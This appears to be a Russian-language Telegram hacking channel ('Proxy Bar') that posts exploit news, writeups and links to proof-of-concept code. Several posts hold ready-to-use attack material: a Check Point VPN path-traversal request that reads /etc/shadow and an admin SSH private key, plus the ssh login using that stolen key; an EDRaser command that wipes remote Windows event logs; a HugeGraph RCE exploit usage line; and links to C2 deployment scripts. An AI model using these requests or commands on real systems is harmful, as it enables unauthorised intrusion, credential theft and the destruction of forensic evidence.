NEW BOT Телеграм, страница

Proxy Bar

EDRaser
*
Тулза для удаленного удаления:
журналов доступа
журналов событий Windows
баз данных
других файлов на удаленных компьютерах.
два режима работы: автоматический и ручной.
*
link
*
Например

python edraser.py --attack windows_event_log --ip 192.168.1.133

👍21😱6

9.01K views14:58

Proxy Bar

Трансмутация вредоносного ПО - Раскрытие скрытых следов кровавой алхимии.
*
Интересный writeup.
Рассматривается анализ вредоносного ПО под названием «BloodAlchemy», которое наблюдали в ходе атаки.
В октябре 2023 года BloodAlchemy была названа Elastic Security Lab 1 новым RATником. Однако расследование показало, что BloodAlchemy — это НЕ совершенно новая вредоносная программа, а развитая версия Deed RAT, преемника ShadowPad.
*
Link

#malware #rat

🔥10👍3

10.4K views16:00

Proxy Bar

This media is not supported in your browser

VIEW IN TELEGRAM

Образовательные мультики по воскресеньям !
*
Едим сырник, пьем кофе, смотрим мультики
*
Как работает нашумевший бэкдор XZUtils SSHD.
#XZ #мультики

👍26🔥9

8.72K viewsedited 04:54

Proxy Bar

Linux Kernel Teaching. Laboratory
*
Большой и годный сборник лекций и лабораторных работ по ядру Linux. Лекции посвящены теоретическому исследованию ядра Linux.
Лабораторки сделаны в стиле инструкций.
Будет полезно: админам, драйверописателям и руткитоварам
*
Link

#linux #kernel

👍12🔥4

9.52K views08:14

Proxy Bar

CVE-2024-2961 - тихоходка
*
Помните месяц назад был кипишь, относительно того что нашли дырку в glibc.
Тогда многие хостеры еще напряглись. Но так как в широкий паблик ничего не уплыло, все успокоились.
А ресёрчеры не успокоились, слишком вкусно пахло перспективным сплоитом.
Ну так вот, на сцену вползает Iconv со своим RCE.
*
Сегодня вышел отличный WriteUp (первая часть из трёх), который раскрывает только часть потенциала дыры 2961
*
Читаем
Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine

🔥26👍11

13.7K views14:16

Proxy Bar

cve-2024-2961_cnext-exploits.zip

7.6 KB

CVE-2024-2961 - тихоходка 2
*
Переполнение буфера в glibc's iconv
*
Exploit + POC 👌

#yammy

🔥22👍1

10.9K views19:10

Proxy Bar

CVE-2024-27842 + CVE-2023-40404 macOS
*
Сплоит позволяет выполнять код на уровне ядра
*
POC exploit (для CVE-2024-27842)
POC exploit (для CVE-2023-40404)

#macos

🔥16😱5👍1

9.27K viewsedited 11:09

Proxy Bar

RWX_MEMEORY_HUNT_AND_INJECTION_DV
*
OneDrive.exe + API-интерфейс = шелл-код (без выделения новой области памяти RWX)
*
link

👍7

8.52K views05:22

Proxy Bar

CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

#0day #checkpoint

🔥38👍8

16.9K views08:23

Proxy Bar

CVE-2024-24919 Check Point Remote Access VPN 0-Day
Ну или так 👌

aCSHELL/../../../../../../../
home/admin/.ssh/id_rsa

*
ssh admin@Хостъ -i id_rsa

#shitPointVPN #0Day

🔥50👍2

16.2K views11:42

Proxy Bar

fuck yeah !
*
ansible-havoc
*
Bash cкрипты/ansible для развертывания Havoc на Linode и настройки и SSL
*
download

#C2 #ansible

👍29🔥2

13.1K views15:14

Proxy Bar

Доброй ночи.
Написал небольшую ~~книжку~~\руководство для начинающих взломщиков Linux.
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org

#book #linux #hex

🔥155👍40😱6

41K views21:31

Proxy Bar

CVE-2024-21512 MySQL2
*
Дырка в библиотеке MySQL для Node.js
*
POC

#mysql

🔥23

12.3K views04:57

Proxy Bar

This media is not supported in your browser

VIEW IN TELEGRAM

CVE-2024-5326 WordPress
*
Post Grid Gutenberg и плагин PostX = 4.1.2
User Contributor включает регистрацию новых пользователей и устанавливает роль по умолчанию для новых пользователей — Администратор.
*
POC exploit

#wordpress #exploit

🔥26👍3

11.7K views08:47

Proxy Bar

Unlock Docker (Россия, Куба, Иран, Судан, Сирия, КимЧенЫновка)
*
BASH noscript
*
#dogger

👍26😱8🔥5

10.2K views11:11

Proxy Bar

Вышел PagedOut
Июнь 2024
*
почитать PDF

#ezine #hacking #tricks #coding

🔥8👍4

9.47K views15:32

Proxy Bar

CVE-2024-36801 SemСms
*
sql injection для версии Semcms v 4.8
*
SQLi + POC

🔥9

9.29K views05:31

Proxy Bar

CVE-2024-27822 macOS PackageKit
*
LPE
*
Для версий:
macOS 14.5 Beta 1 (23F5049f) and older
macOS 13.6.6 (22G630) and older
macOS 12.7.4 (21H1123) and older
Any version of macOS 11 or older
*
writeUp
*
exploit

#macos #lpe

👍4😱1

9.36K views15:57

Proxy Bar

CVE-2024-27348 RCE в Apache HugeGraph Server
*
Usage:
python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute"

*
POC exploit

#apache #rce

🔥10

9.67K views16:00

Proxy Bar

Proxy Bar pinned a photo

16:01

Proxy Bar

CVE-2024-4577 Argument Injection in PHP-CGI
*
При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда PHP-CGI работает на платформе Windows и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации.
*
fofa link (610,604 хостов)

#php #xamp

👍14

12.3K views08:14

About

Blog

Apps

Platform